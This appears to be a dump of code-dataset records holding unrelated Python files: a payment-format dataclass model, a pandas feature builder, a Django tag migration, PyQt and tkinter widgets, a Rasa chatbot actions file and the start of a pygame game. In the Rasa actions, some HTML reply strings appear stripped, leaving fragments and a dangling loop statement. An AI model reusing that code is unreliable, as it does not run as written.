periodicity: periodicity of the standing order\n :ivar last_date: date of the last payment of the standing order\n \"\"\"\n day: Optional[int] = field(\n default=None,\n metadata={\n \"name\": \"Day\",\n \"type\": \"Element\",\n \"namespace\": \"http://www.bysquare.com/bysquare\",\n }\n )\n month: List[Month] = field(\n default_factory=list,\n metadata={\n \"name\": \"Month\",\n \"type\": \"Element\",\n \"namespace\": \"http://www.bysquare.com/bysquare\",\n \"tokens\": True,\n }\n )\n periodicity: Optional[Periodicity] = field(\n default=None,\n metadata={\n \"name\": \"Periodicity\",\n \"type\": \"Element\",\n \"namespace\": \"http://www.bysquare.com/bysquare\",\n \"required\": True,\n }\n )\n last_date: Optional[str] = field(\n default=None,\n metadata={\n \"name\": \"LastDate\",\n \"type\": \"Element\",\n \"namespace\": \"http://www.bysquare.com/bysquare\",\n }\n )\n\n\n@dataclass\nclass Payment:\n \"\"\"\n :ivar payment_options: Define which payment options are available:\n \"paymentorder\", \"standingorder\" - requires StandingOrderExt,\n \"directdebit\" - requires DirectDebitExt.\n :ivar amount: payment amount\n :ivar currency_code: payment currency code, 3 letter ISO4217 code\n :ivar payment_due_date: payment due date. Used also as first payment\n date for standing order.\n :ivar variable_symbol: variable symbol\n :ivar constant_symbol: constant symbol\n :ivar specific_symbol: specific symbol\n :ivar originators_reference_information: reference information\n :ivar payment_note: payment note\n :ivar bank_accounts: list of bank accounts\n :ivar standing_order_ext: standing order extension. Extends basic\n payment information with information required for standing order\n setup\n :ivar direct_debit_ext: direct debit extension. Extends basic\n payment information with information required for identification\n and setup of direct debit\n :ivar beneficiary_name:\n :ivar beneficiary_address_line1:\n :ivar beneficiary_address_line2:\n \"\"\"\n payment_options: List[PaymentOption] = field(\n default_factory=list,\n metadata={\n \"name\": \"PaymentOptions\",\n \"type\": \"Element\",\n \"namespace\": \"http://www.bysquare.com/bysquare\",\n \"required\": True,\n \"tokens\": True,\n }\n )\n amount: Optional[Decimal] = field(\n default=None,\n metadata={\n \"name\": \"Amount\",\n \"type\": \"Element\",\n \"namespace\": \"http://www.bysquare.com/bysquare\",\n }\n )\n currency_code: Optional[str] = field(\n default=None,\n metadata={\n \"name\": \"CurrencyCode\",\n \"type\": \"Element\",\n \"namespace\": \"http://www.bysquare.com/bysquare\",\n \"required\": True,\n \"pattern\": r\"[A-Z]{3}\",\n }\n )\n payment_due_date: Optional[str] = field(\n default=None,\n metadata={\n \"name\": \"PaymentDueDate\",\n \"type\": \"Element\",\n \"namespace\": \"http://www.bysquare.com/bysquare\",\n }\n )\n variable_symbol: Optional[str] = field(\n default=None,\n metadata={\n \"name\": \"VariableSymbol\",\n \"type\": \"Element\",\n \"namespace\": \"http://www.bysquare.com/bysquare\",\n \"pattern\": r\"[0-9]{0,10}\",\n }\n )\n constant_symbol: Optional[str] = field(\n default=None,\n metadata={\n \"name\": \"ConstantSymbol\",\n \"type\": \"Element\",\n \"namespace\": \"http://www.bysquare.com/bysquare\",\n \"pattern\": r\"[0-9]{0,4}\",\n }\n )\n specific_symbol: Optional[str] = field(\n default=None,\n metadata={\n \"name\": \"SpecificSymbol\",\n \"type\": \"Element\",\n \"namespace\": \"http://www.bysquare.com/bysquare\",\n \"pattern\": r\"[0-9]{0,10}\",\n }\n )\n originators_reference_information: Optional[str] = field(\n default=None,\n metadata={\n \"name\": \"OriginatorsReferenceInformation\",\n \"type\": \"Element\",\n \"namespace\": \"http://www.bysquare.com/bysquare\",\n }\n )\n payment_note: Optional[str] = field(\n default=None,\n metadata={\n \"name\": \"PaymentNote\",\n \"type\": \"Element\",\n \"namespace\": \"http://www.bysquare.com/bysquare\",\n }\n )\n bank_accounts: Optional[BankAccounts] = field(\n default=None,\n metadata={\n \"name\": \"BankAccounts\",\n \"type\": \"Element\",\n \"namespace\": \"http://www.bysquare.com/bysquare\",\n \"required\": True,\n }\n )\n standing_order_ext: Optional[StandingOrderExt] = field(\n default=None,\n metadata={\n \"name\": \"StandingOrderExt\",\n \"type\": \"Element\",\n \"namespace\": \"http://www.bysquare.com/bysquare\",\n }\n )\n direct_debit_ext: Optional[DirectDebitExt] = field(\n default=None,\n metadata={\n \"name\": \"DirectDebitExt\",\n \"type\": \"Element\",\n \"namespace\": \"http://www.bysquare.com/bysquare\",\n }\n )\n beneficiary_name: Optional[str] = field(\n default=None,\n metadata={\n \"name\": \"BeneficiaryName\",\n \"type\": \"Element\",\n \"namespace\": \"http://www.bysquare.com/bysquare\",\n }\n )\n beneficiary_address_line1: Optional[str] = field(\n default=None,\n metadata={\n \"name\": \"BeneficiaryAddressLine1\",\n \"type\": \"Element\",\n \"namespace\": \"http://www.bysquare.com/bysquare\",\n }\n )\n beneficiary_address_line2: Optional[str] = field(\n default=None,\n metadata={\n \"name\": \"BeneficiaryAddressLine2\",\n \"type\": \"Element\",\n \"namespace\": \"http://www.bysquare.com/bysquare\",\n }\n )\n\n\n@dataclass\nclass Payments:\n \"\"\"\n :ivar payment: Payment order definition.\n \"\"\"\n payment: List[Payment] = field(\n default_factory=list,\n metadata={\n \"name\": \"Payment\",\n \"type\": \"Element\",\n \"namespace\": \"http://www.bysquare.com/bysquare\",\n \"min_occurs\": 1,\n }\n )\n\n\n@dataclass\nclass PayBase(BySquareDocument):\n \"\"\"\n :ivar invoice_id: Invoice identification code. Only used when pay by\n square is part of the invoice. Otherwise this field is empty.\n :ivar payments: Lists one or more payments.\n \"\"\"\n invoice_id: Optional[str] = field(\n default=None,\n metadata={\n \"name\": \"InvoiceID\",\n \"type\": \"Element\",\n \"namespace\": \"http://www.bysquare.com/bysquare\",\n }\n )\n payments: Optional[Payments] = field(\n default=None,\n metadata={\n \"name\": \"Payments\",\n \"type\": \"Element\",\n \"namespace\": \"http://www.bysquare.com/bysquare\",\n \"required\": True,\n }\n )\n\n\n@dataclass\nclass Pay(PayBase):\n class Meta:\n namespace = \"http://www.bysquare.com/bysquare\"\n","sub_path":"paybysquare/model/bysquare_pay_1_1_0.py","file_name":"bysquare_pay_1_1_0.py","file_ext":"py","file_size_in_byte":13577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"11555217","text":"\n# IMport dependencies\nimport pandas as pd\nfrom pandas import set_option\nimport numpy as np\nimport os\nimport csv\n\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\n\n# from keras.utils import to_categorical\n\n# import preprocessing from sklearn\nfrom sklearn import preprocessing\n\n# DictVectorizer\nfrom sklearn.feature_extraction import DictVectorizer\n\n\n#############################################################################################################\n# Fuction to generate X predictor array or dataframe from raw data and key features columns required\n# Accepts Two parameters\n# ohe : One Hot Encoding required\n# target : BTU or DOLLAR. Based on the target being predicted the target columns will be dropped / retained\n#############################################################################################################\n\ndef generateX_samp(ohe = True, target = \"BTU\", numSamples = 20, region = 0, totsqft_cd = 0): \n\n dataFilePath = \"dataforfinalproject\"\n filename = \"RECS_COMBINED_DATA.csv\"\n cols_file = \"Final_Columns_withCat.csv\"\n \n totsqt = {0 : \"(df_recs.TOTHSQFT != -1)\",\n 1 : \"(df_recs.TOTHSQFT < 900)\",\n 2 : \"((df_recs.TOTHSQFT >= 900) & (df_recs.TOTHSQFT < 1500))\",\n 3 : \"((df_recs.TOTHSQFT >= 1500) & (df_recs.TOTHSQFT < 2500))\",\n 4 : \"((df_recs.TOTHSQFT >= 2500) & (df_recs.TOTHSQFT < 3500))\",\n 5 : \"(df_recs.TOTHSQFT >= 3500)\"}\n \n\n # read dataset wih all years combined data\n df_recs = pd.read_csv(os.path.join(dataFilePath, filename), low_memory= False)\n\n if(numSamples != 0 and numSamples != df_recs.shape[0]):\n if(region != 0): \n sample_df = df_recs[(df_recs.REGIONC == region) & (eval(totsqt[totsqft_cd]))].sample( n = numSamples)\n else:\n sample_df = df_recs[(eval(totsqt[totsqft_cd]))].sample( n = numSamples)\n print(sample_df)\n else:\n sample_df = df_recs\n \n \n # read the columns from Columns csv\n df_cols = pd.read_csv(os.path.join(dataFilePath, cols_file))\n# df_cols.columns\n\n # Whittle down the dataset to contain only Features required for modeling - X \n modelDF = sample_df[df_cols[df_cols.FEATURES_MODEL == \"Y\"].COLUMN_NAME]\n modelDF.to_csv(os.path.join(\"dataforfinalproject/InputSamples.csv\"), index = True)\n print(f\" X Features shape : {modelDF.shape}\")\n\n \n \n\n \n if(target == \"BTU\"):\n # Drop Price / Cost related Columns as it is only Consumption we are interested in \n cost_cols = df_cols[(df_cols['COLUMN_NAME'].str.find(\"DOL\") != -1) & (df_cols.FEATURES_MODEL == \"Y\")].COLUMN_NAME.tolist()\n modelDF.drop(cost_cols, axis = 1, inplace = True)\n # Drop All BTU related cols too\n btu_cols = df_cols[(df_cols['COLUMN_NAME'].str.find(\"BTU\") != -1) & (df_cols.FEATURES_MODEL == \"Y\")].COLUMN_NAME.tolist()\n modelDF.drop(btu_cols, axis = 1, inplace = True)\n \n # and drop TOTAL BTU from X set\n# X = modelDF.drop(['TOTALBTU'], axis = 1)\n y_label = sample_df['TOTALBTU']\n print(f\"y label shape : {y_label.shape}\")\n else:\n # Drop Price / Cost related Columns as it is only Consumption we are interested in \n cost_cols = df_cols[(df_cols['COLUMN_NAME'].str.find(\"DOL\") != -1) & (df_cols.FEATURES_MODEL == \"Y\")].COLUMN_NAME.tolist()\n modelDF.drop(cost_cols, axis = 1, inplace = True)\n \n # Also drop the Total BTU cols \n btu_cols = df_cols[(df_cols['COLUMN_NAME'].str.find(\"TOTALBTU\") != -1) & (df_cols.FEATURES_MODEL == \"Y\")].COLUMN_NAME.tolist()\n modelDF.drop(btu_cols, axis = 1, inplace = True)\n\n y_label = sample_df['TOTALDOLLAR']\n print(f\"y label shape : {y_label.shape}\")\n # and drop TOTAL BTU from X set\n# X = modelDF.drop(['TOTALDOLLAR'], axis = 1)\n \n X = modelDF\n print(f\"shape of X is {X.shape}\")\n\n if(ohe):\n ### Apply dict vectorizer \n # convert the X array into a dict\n X_dict = X.to_dict(orient = \"records\")\n \n\n # instantiate a Dictvectorizer object for X\n dv_X = DictVectorizer(sparse=False) # sparse = False makes the output is not a sparse matrix\n\n # apply dv_X on X_dict\n X_encoded = dv_X.fit_transform(X_dict)\n \n vocab = dv_X.get_feature_names()\n # return X_encoded and its vocab\n return (X_encoded, vocab, y_label)\n else:\n return (X, X.columns,y_label)\n\n\n# In[4]:\n\n\n# generateX()\n\n\n# In[ ]:\n\n\n\n\n","sub_path":"generateXdataExt.py","file_name":"generateXdataExt.py","file_ext":"py","file_size_in_byte":4572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"639000907","text":"# -*- coding: utf-8 -*-\n\n\nfrom django.db import migrations\n\nfrom django.conf import settings\nfrom django.core import serializers\n\nfrom TWLight.resources.models import TextFieldTag, Partner\nfrom taggit.models import Tag, TaggedItem\nfrom taggit.managers import TaggableManager\n\n# Migrate the existing tag objects to the model that lives in resources.\ndef copy_tags(apps, schema_editor):\n for old_tag in Tag.objects.all():\n new_tag = TextFieldTag()\n new_tag.name = old_tag.name\n new_tag.slug = old_tag.slug\n new_tag.save()\n\n\n# Opportunistically apply data from old tag field to the new tag field.\ndef retag_partners(apps, schema_editor):\n # Wrapped in try because languages that have been added after this\n # migration will be a dependency of the Partner objects. This is a\n # One-shot data migration, so it's fine if we skip it forever once all\n # servers have run it at least once.\n try:\n for partner in Partner.objects.all():\n old_tags = partner.old_tags.all()\n for old_tag in old_tags:\n partner.tags.add(old_tag.name)\n partner.save()\n except:\n pass\n\n\n# Delete the old tag data\ndef delete_old_tags(apps, schema_editor):\n for old_tag in Tag.objects.all():\n old_tag.delete()\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n (\"taggit\", \"0002_auto_20150616_2121\"),\n (\"resources\", \"0044_auto_20180612_1453\"),\n ]\n\n operations = [\n migrations.AddField(\n model_name=\"partner\",\n name=\"old_tags\",\n field=TaggableManager(\n blank=True,\n help_text=\"A comma-separated list of tags.\",\n through=\"taggit.TaggedItem\",\n to=\"taggit.Tag\",\n verbose_name=\"Old Tags\",\n ),\n ),\n migrations.RunPython(copy_tags),\n migrations.RunPython(retag_partners),\n migrations.RunPython(delete_old_tags),\n ]\n","sub_path":"TWLight/resources/migrations/0045_migrate_tags.py","file_name":"0045_migrate_tags.py","file_ext":"py","file_size_in_byte":1985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"45306225","text":"from qt_core import *\nfrom gui.gui_constants import *\n\n\nclass FormLineEdit(QLineEdit):\n def __init__(\n self,\n width: int=Dimension.LINE_EDIT_DEF_WIDTH,\n height: int=Dimension.LINE_EDIT_DEF_HEIGHT,\n bg_color: str = Color.LINE_EDIT_DEF_BG_COLOR,\n bg_hover: str = Color.LINE_EDIT_DEF_HOVER_COLOR,\n text_alignment: str = \"left\",\n visibility: bool=True\n ):\n super().__init__()\n\n self.width, self.height = width, height\n\n self.is_visible = visibility\n self.bg_color = bg_color\n self.bg_hover = bg_hover\n self.text_alignment = text_alignment\n self.setMinimumHeight(height)\n self.setMinimumWidth(width) \n self.setMaximumWidth(width)\n self.setVisible(self.is_visible)\n\n # Applying the additional methods\n self.set_style()\n self.set_alignment()\n\n\n def set_alignment(self):\n \"\"\"Sets the alignment according to the entered string for this parameter.\"\"\"\n POSSIBLE_ALIGNMENTS = {\n \"right\": Qt.AlignRight,\n \"center\": Qt.AlignCenter,\n \"left\": Qt.AlignLeft\n }\n self.setAlignment(POSSIBLE_ALIGNMENTS[self.text_alignment])\n\n \n def set_style(self):\n \"\"\"Sets a stylesheet\"\"\"\n stylesheet_str = f\"\"\"\n QLineEdit {{\n background-color: {self.bg_color};\n }}\n\n QLineEdit:hover {{\n background-color: {self.bg_hover};\n }}\n \"\"\"\n\n self.setStyleSheet(stylesheet_str)\n\n","sub_path":"gui/widgets/py_lineedit.py","file_name":"py_lineedit.py","file_ext":"py","file_size_in_byte":1529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"150448309","text":"import pygame\nimport sys\nfrom module1 import *\nfrom but import *\nfrom main1 import * #main\nfrom tkinter import *\n# from sp3 import *\n\ndef sound_controll():\n root = Tk()\n root.title(\"MUSIC CONTROLL\")\n root.geometry(\"120x220+500+300\") #가로 크기, 세로 크기, x좌표, y좌표\n root.resizable(False, False) #x(너비), y(높이) 값 변경 불가\n def v_up():\n v = pygame.mixer.music.get_volume()\n pygame.mixer.music.set_volume(v + 0.1)\n print(\"volume up\")\n time.sleep(0.2)\n\n def v_down():\n v = pygame.mixer.music.get_volume()\n pygame.mixer.music.set_volume(v - 0.1)\n print(\"volume down\")\n time.sleep(0.2)\n\n btn_up = Button(root, width = 11, height = 2, fg = \"black\", bg = \"gray\", text = \"Volume Up\", command = v_up)\n btn_up.place(x = 19, y = 20)\n\n btn_down = Button(root, width = 11, height = 2, fg = \"black\", bg = \"gray\", text = \"Volume Down\", command = v_down)\n btn_down.place(x = 19, y = 70)\n\n mute = IntVar() #여기에 int형으로 값을 저장\n mute_button = Radiobutton(root, fg = \"black\", bg = \"gray\", text=\"pause\", value=1, variable=mute) # value 가 숫자면 variable의 상태가 Int으로 적어야함\n mute_button.place(x = 20, y = 130)\n mute_button = Radiobutton(root, fg = \"black\", bg = \"gray\", text=\"unpause\", value=2, variable=mute) # value 가 숫자면 variable의 상태가 Int으로 적어야함\n mute_button.place(x = 20, y = 170)\n\n mute_value = mute.get()\n print(mute_value)\n \n if mute_value == 1:\n pygame.mixer.music.pause()\n time.sleep(0.2)\n elif mute_value == 2:\n pygame.mixer.music.unpause()\n time.sleep(0.2)\n\n root.configure(bg='gray')\n root.mainloop()","sub_path":"Older_Demo/Sound_controll.py","file_name":"Sound_controll.py","file_ext":"py","file_size_in_byte":1749,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"322790352","text":"# This files contains your custom actions which can be used to run\n# custom Python code.\n#\n# See this guide on how to implement these action:\n# https://rasa.com/docs/rasa/custom-actions\n\n\n# This is a simple example for a custom action which utters \"Hello World!\"\n\nfrom typing import Any, Text, Dict, List\n\nfrom rasa_sdk import Action, Tracker\nfrom rasa_sdk.events import SlotSet\nfrom rasa_sdk.executor import CollectingDispatcher\nimport random\nimport requests\nimport json\n#加入文字分析模組&外部搜尋模組\n#from . import TextAnalyze\n#from .OuterSearch import outerSearch\n##摘要\n#from . import StackData\n\nhead_url='http://localhost:55001/api/'\n#head_url='https://soselab.asuscomm.com:55002/api/'\n \nclass ask_return_and_reward(Action):\n def name(self) -> Text:\n return \"ask_return_and_reward\"\n def run(self, dispatcher, tracker, domain) -> List[Dict[Text, Any]]:\n #為回答者加積分\n# if tracker.get_slot(\"discuss_tags\") != None:\n# selected_tags_id = tracker.get_slot(\"discuss_tags\").split(':',1)[1]\n# selected_tags_id = selected_tags_id.replace(\" \", \"\")\n# selected_tags_array = selected_tags_id.split(',')\n# else:\n# selected_tags_array = []\n #拿到tags\n replier_id_room_id = tracker.get_slot(\"replier_id\").split(',')\n replier_id = replier_id_room_id[1]\n room_id = replier_id_room_id[2]\n print(\"replier_id: \"+replier_id)\n print(\"room_id: \"+room_id)\n #加分!\n# tags=[]\n# for i in selected_tags_array:\n# r = requests.get(url = head_url+'query_tag_name', params = {'tag_id':i})\n# data = r.json()\n# tag_name = data['tag_name']\n# tags.append({'tag_id':i, 'tag_name':tag_name})\n# requests.post(head_url+'update_user_score', json={'_id':replier_id, 'tag':tags, 'score':3})\n \n reply=\"請問你願意回報此問題嗎?(僅限提問者回覆)\"\n dispatcher.utter_message(text=reply)\n return []\n \nclass error_message_search(Action):\n def name(self) -> Text:\n return \"error_message_search\"\n def run(self, dispatcher, tracker, domain) -> List[Dict[Text, Any]]:\n function = tracker.get_slot(\"function\")\n print(\"pl(programming language):\"+tracker.get_slot(\"pl\"))\n os = tracker.get_slot(\"os\")[0:-13]\n pl = tracker.get_slot(\"pl\")[0:-13]\n print(\"pl(programming language):\"+pl)\n error_message_search_time = int(tracker.get_slot(\"error_message_search_time\"))\n #拿到所需訊息及最後一句使用者輸入\n question_or_error_message = tracker.get_slot(\"error_message_question\")\n question_or_error_message = question_or_error_message.split(',',1)[1]\n qkey = question_or_error_message.split(' ')\n qkey.append(os)\n qkey.append(pl)\n \n# #外部搜尋結果(URL)\n# resultpage = outerSearch(qkey, 10, error_message_search_time)\n# \n# stack_items = [StackData(url) for url in resultpage]\n# result_title = []\n## for i in resultpage:\n# for items in stack_items:\n# #showData回傳的資料即是傳送到前端的json格式\n# display = items.showData()\n# result_title.append(display['question']['title'])\n## result_title.append(i)\n \n reply = \"謝謝您的等待,以下為搜尋結果的資料摘要:\"\n# for i in range(0, len(resultpage)):\n# reply += (\"
\" + str(i+1) + \".\"+ result_title[i] + \"\")\n reply += \"
點選摘要連結可顯示內容。

是否要繼續搜尋?\"\n\n #reply += \"點我查看所有答案排名\"\n dispatcher.utter_message(text=reply)\n return [SlotSet(\"error_message_search_time\", float(error_message_search_time+1))]\n \n \nclass popover_return_incognito(Action):\n def name(self) -> Text:\n return \"popover_return_incognito\"\n def run(self, dispatcher, tracker, domain) -> List[Dict[Text, Any]]:\n# affirm = [\"好\", \"是\", \"匿名\", \"我要匿名\"]\n deny = [\"不\", \"否\", \"no\", \"別\"]\n incognito = tracker.get_slot(\"whether_incognito\").split(',',1)[1]\n reply = \"popover,是\"\n for i in deny:\n if i in incognito:\n reply = \"popover,否\"\n dispatcher.utter_message(text=reply)\n return []\n \n \nclass received_discuss_tags(Action):\n def name(self) -> Text:\n return \"received_discuss_tags\"\n def run(self, dispatcher, tracker, domain) -> List[Dict[Text, Any]]:\n print(\"received_discuss_tags\")\n selected_tags_id = tracker.get_slot(\"discuss_tags\").split(':',1)[1]\n selected_tags_id.replace(\" \", \"\")\n selected_tags_array = selected_tags_id.split(',')\n selected_tags_name=\"\"\n for i in selected_tags_array:\n r = requests.get(url = head_url+'query_tag_name', params = {'tag_id':i})\n data = r.json()\n tag_name = data['tag_name']\n selected_tags_name += (tag_name+', ')\n selected_tags_name=selected_tags_name[0:-2]\n reply = \"接收到了 \"+selected_tags_name+\" 標籤。請說明你想討論的問題。\"\n dispatcher.utter_message(text=reply)\n return []\n \n \n#將整句話(問題描述、錯誤訊息)填入slot\nclass fill_slot(Action):\n def name(self) -> Text:\n return \"fill_slot\"\n\n def run(self, dispatcher, tracker, domain) -> List[Dict[Text, Any]]:\n function = tracker.get_slot(\"function\")\n os = tracker.get_slot(\"os\")\n pl = tracker.get_slot(\"pl\")\n \n print(\"os: \", os)\n print(\"pl: \", pl)\n if os!=None and pl!=None:\n if \"錯誤訊息\" in function:\n reply = \"請貼上您的錯誤訊息\"\n elif \"引導式\" in function:\n reply = \"請描述您遇到的問題\"\n else:\n reply = \"你的function抓不到\"\n else:\n if \"共同討論\" in function:\n reply = \"是否匿名?\"\n else:\n if pl == None:\n reply = \"請問您使用的是什麼程式語言?
若之後要修改,請輸入「我要更改程式語言」\"\n elif os == None:\n reply = \"請問您使用的是什麼作業系統?
若之後要修改,請輸入「我要更改作業系統」\"\n \n dispatcher.utter_message(text=reply)\n return []\n\n#分析並搜尋並記下使用者輸入及相關關鍵字(第一次搜尋)\nclass analyze_and_search(Action):\n def name(self) -> Text:\n return \"analyze_and_search\"\n def run(self, dispatcher, tracker, domain) -> List[Dict[Text, Any]]:\n print('in analyze_and_search')\n function = tracker.get_slot(\"function\")\n print(\"pl(programming language):\"+tracker.get_slot(\"pl\"))\n os = tracker.get_slot(\"os\")[0:-13]\n pl = tracker.get_slot(\"pl\")[0:-13]\n print(\"pl(programming language):\"+pl)\n if \"錯誤訊息\" in function:\n #拿到所需訊息及最後一句使用者輸入\n question_or_error_message = tracker.latest_message.get('text')\n question_or_error_message = question_or_error_message.split(',',1)[1]\n qkey = question_or_error_message.split(' ')\n qkey.append(os)\n qkey.append(pl)\n \n #外部搜尋結果(URL)\n resultpage = outerSearch(qkey, 10, 0)\n \n stack_items = [StackData(url) for url in resultpage]\n result_title = []\n# for i in resultpage:\n for items in stack_items:\n #showData回傳的資料即是傳送到前端的json格式\n display = items.showData()\n result_title.append(display['question']['title'])\n# result_title.append(i)\n \n reply = \"謝謝您的等待,以下為搜尋結果的資料摘要:\"\n for i in range(0, len(resultpage)):\n reply += (\"
\" + str(i+1) + \".\"+ result_title[i] + \"\")\n reply += \"
點選摘要連結可顯示內容。

希望有幫到你,歡迎下次光臨!\"\n\n #reply += \"點我查看所有答案排名\"\n dispatcher.utter_message(text=reply)\n return []\n elif \"引導式\" in function:\n #拿到所需訊息及最後一句使用者輸入\n question_or_error_message = tracker.latest_message.get('text')\n question_or_error_message = question_or_error_message.split(',',1)[1]\n print(question_or_error_message)\n \n #宣告文字分析器\n# textAnalyzer = TextAnalyze.TextAnalyze()\n #擷取使用者問題的關鍵字\n qkey = ['flask']\n# qkey = textAnalyzer.contentPreProcess(question_or_error_message)[0]\n #加上作業系統與程式語言作為關鍵字\n qkey.append(os)\n qkey.append(pl)\n print(\"qkey:\")\n print(qkey)\n# resultpage = outerSearch(qkey, 10, 0)\n #內部搜尋\n# response = requests.post(head_url+'query_inner_search', json={'keywords':qkey})\n # print(\"內部搜尋的結果: \", response.text)\n \n # 慈 START\n# objectAllPost = json.loads(response.text)\n# if objectAllPost[\"inner_search_result\"] != None:\n# postNumber = 1\n# reply = \"謝謝您的等待,以下為搜尋結果:
\"\n# for i in range(0, len(objectAllPost[\"inner_search_result\"])):\n# postId = objectAllPost[\"inner_search_result\"][i]\n# singlePostResponse = requests.post(head_url+'query_inner_post', json={'_id':postId})\n# # 轉成object\n# objectSinglePost = json.loads(singlePostResponse.text)\n# # print(\"單篇文章結果: \", objectSinglePost)\n# reply += str(postNumber)\n# reply += '. '\n# reply += objectSinglePost[\"title\"]\n# reply += '
'\n# postNumber += 1\n#\n# # print(\"reply的結果: \"+reply);\n# else:\n# reply = \"\"\n # 慈 END\n \n #外部搜尋結果(URL)\n# resultpage = outerSearch(qkey, 10, 0)\n# for url in resultpage:\n# print(url)\n\n #外部搜尋\n #stackoverflow物件\n# stack_items = StackData.parseStackData(resultpage)\n ######假資料~~~~~\n \n #with open(\"DATA_test.json\", \"r\", encoding=\"utf-8\") as f:\n # stack_items = json.load(f)\n \n# raw_data = [\" \".join([item['question']['abstract'], \" \".join([ans['abstract'] for ans in item['answers']])]) for item in stack_items ]\n #取得block排名\n# result = TextAnalyze.blockRanking(stack_items, qkey)\n #print(result)\n# for i in stack_items:\n# i['question']['abstract'] = str(textAnalyzer.textSummarization(i['question']['abstract']))\n# for ans in i['answers']:\n# ans['abstract'] = str(textAnalyzer.textSummarization(ans['abstract']))\n#\n# temp_data_id_list = requests.post(head_url + 'insert_cache', json={'data' : stack_items, 'type' : \"temp_data\"})\n# block_rank_id = requests.post(head_url + 'insert_cache', json={'data': result, 'type' : \"blocks_rank\"})\n#\n# print(temp_data_id_list.text)\n# print(block_rank_id.text)\n# t_data_list = json.loads(temp_data_id_list.text)\n# blocks = json.loads(block_rank_id.text)\n\n #每篇title\n# result_title = [item['question']['title'] for item in stack_items]\n\n# reply += \"謝謝您的等待,以下為搜尋結果的資料摘要:\"\n# for i in range(0, len(t_data_list)):\n# reply += (\"
\" + str(i+1) + \".\" + result_title[i] + \"\")\n# reply += \"
點選摘要連結可顯示內容。
\"\n# reply += \"點我查看所有答案排名\"\n# reply += \"

是否要繼續搜尋?\"\n# dispatcher.utter_message(text=reply)\n \n # dispatcher.utter_message(text=\"是否繼續搜尋?\")\n \n # 慈 START\n # reply += \"

是否繼續搜尋?\"\n#dispatcher.utter_message(text=reply)\n # 慈 END\n\n# more_keywords = textAnalyzer.keywordExtraction(raw_data)\n# qkey = qkey + more_keywords\n #!!!將關鍵字及更多關鍵字存入slot\n dispatcher.utter_message(text=\"是否繼續搜尋?\")\n return [SlotSet(\"keywords\", ','.join(qkey))]\n \n \n \n#給user選關鍵字\nclass select_keyword(Action):\n def name(self) -> Text:\n return \"select_keyword\"\n def run(self, dispatcher, tracker, domain) -> List[Dict[Text, Any]]:\n #!!!拿到之前存的關鍵字\n print(\"給使用者選關鍵字了!\")\n qkey = tracker.get_slot(\"keywords\")\n print(qkey)\n qkey = qkey.split(',')\n \n #------------test------------#\n #textAnalyzer = TextAnalyze.TextAnalyze()\n #more_keywords = textAnalyzer.keywordExtraction(eval(raw_data))\n #----------------------------#\n \n reply = '新增/刪除用來搜尋的關鍵字
x'\n id += 1\n reply += '

'\n \n dispatcher.utter_message(text=reply)\n return []\n \n \n\n#拿選好的關鍵字搜尋(繼續搜尋)\nclass outer_search(Action):\n def name(self) -> Text:\n return \"outer_search\"\n def run(self, dispatcher, tracker, domain) -> List[Dict[Text, Any]]:\n #拿到所需訊息及最後一句使用者輸入\n print(\"去外部搜尋了!\")\n keywords = tracker.latest_message.get('text')\n keywords = keywords.split(',',1)[1]\n print(keywords)\n \n qkey = keywords.split(',')\n# #外部搜尋結果(URL)\n# resultpage = outerSearch(qkey, 10, 0)\n# for url in resultpage:\n# print(url)\n# #外部搜尋\n# #stackoverflow物件\n# stack_items = StackData.parseStackData(resultpage)\n#\n# #假資料~~~~~\n# #with open(\"DATA_test.json\", \"r\", encoding=\"utf-8\") as f:\n# # stack_items = json.load(f)\n#\n# raw_data = [ \" \".join([item['question']['abstract'], \" \".join([ans['abstract'] for ans in item['answers']])]) for item in stack_items ]\n# #取得block排名\n# result = TextAnalyze.blockRanking(stack_items, qkey)\n# #print(result)\n# temp_data_id_list = requests.post(head_url + 'insert_cache', json={'data' : stack_items[0:5], 'type' : \"temp_data\"})\n# block_rank_id = requests.post(head_url + 'insert_cache', json={'data': result, 'type' : \"blocks_rank\"})\n# print(temp_data_id_list.text)\n# print(block_rank_id.text)\n# t_data_list = json.loads(temp_data_id_list.text)\n# blocks = json.loads(block_rank_id.text)\n#\n# #每篇title\n# result_title = [item['question']['title'] for item in stack_items]\n \n reply = \"謝謝您的等待,以下為搜尋結果的資料摘要:\"\n# reply += \"謝謝您的等待,以下為搜尋結果的資料摘要:\"\n# for i in range(0, len(t_data_list)):\n# reply += (\"
\" + str(i+1) + \".\" + result_title[i] + \"\")\n# reply += \"
點選摘要連結可顯示內容。
\"\n# reply += \"點我查看所有答案排名\"\n# reply += \"

是否要繼續搜尋?\"\n dispatcher.utter_message(text=reply)\n \n return []\n","sub_path":"models/rasa-demo/actions/actions.py","file_name":"actions.py","file_ext":"py","file_size_in_byte":17104,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"587862422","text":"import os\r\nimport pygame\r\n\r\nfrom player import Ball\r\nfrom world import World, load_level\r\n\r\npygame.init()\r\nWIDTH, HEIGHT = 192, 192\r\nwin = pygame.display.set_mode((WIDTH, HEIGHT), pygame.NOFRAME)\r\npygame.display.set_caption('Bounce')\r\n\r\nclock = pygame.time.Clock()\r\nFPS = 30\r\n\r\n# GAME VARIABLES **************************************************************\r\nROWS = 12\r\nMAX_COLS = 150\r\nTILE_SIZE = 16\r\n\r\n# COLORS **********************************************************************\r\n\r\nBLUE = (175, 207, 240)\r\n\r\n# GROUPS **********************************************************************\r\n\r\nspikes_group = pygame.sprite.Group()\r\ninflator_group = pygame.sprite.Group()\r\ndeflator_group = pygame.sprite.Group()\r\n\r\n\r\nobjects_groups = [spikes_group, inflator_group, deflator_group]\r\ncollision_groups = [inflator_group, deflator_group]\r\n\r\n# RESET ***********************************************************************\r\n\r\nlevel = 1\r\n\r\ndef reset_level(level):\r\n\tspikes_group.empty()\r\n\tinflator_group.empty()\r\n\tdeflator_group.empty()\r\n\r\n\t# 